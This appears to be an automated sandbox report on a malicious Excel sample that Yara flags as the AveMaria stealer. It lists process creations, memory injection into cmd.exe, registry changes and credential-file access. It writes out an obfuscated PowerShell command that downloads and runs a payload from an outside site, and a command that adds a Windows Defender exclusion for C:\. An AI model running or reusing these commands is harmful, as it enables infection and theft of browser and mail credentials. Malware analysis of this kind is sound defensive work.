Source: ModuleAnalysisCache.3.dr	Binary or memory string: Set-VMNetworkAdapterFailoverConfiguration
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f+Remove-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Add-VmNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Remove-VMScsiController
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f(Get-VMNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f+Remove-VMNetworkAdapterRoutingDomainMappingitpe+
Source: ModuleAnalysisCache.3.dr	Binary or memory string: OC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Remove-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr	Binary or memory string: (Set-VmNetworkAdapterRoutingDomainMapping
Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	Binary or memory string: f(Add-VmNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Remove-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr	Binary or memory string: Get-VMNetworkAdapterExtendedAcl

Source: C:\Windows\system32\drivers\tsusbhub.sys

System information queried: ModuleInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_004252D0 mov eax, dword ptr fs:[00000030h]	18_2_004252D0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_00424F75 mov eax, dword ptr fs:[00000030h]	18_2_00424F75
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_00424FD2 mov eax, dword ptr fs:[00000030h]	18_2_00424FD2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_00424FE7 mov eax, dword ptr fs:[00000030h]	18_2_00424FE7
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_00424FFB mov eax, dword ptr fs:[00000030h]	18_2_00424FFB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\			Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D80000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 11A0000 protect: page read and write			Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Thread created: C:\Windows\SysWOW64\cmd.exe EIP: D8010E

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\Test3.jpg protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Memory written: C:\Windows\SysWOW64\cmd.exe base: D80000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Memory written: C:\Windows\SysWOW64\cmd.exe base: 11A0000			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg	Jump to behavior

Source: Yara match

File source: Telex06012020.xls, type: SAMPLE

Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp	Binary or memory string: GetProgmanWindow
Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connection per server for Internet Explorer

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Stealing of Sensitive Information:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: Test3.jpg PID: 5940, type: MEMORY
Source: Yara match	File source: Process Memory Space: Test3.jpg PID: 6852, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

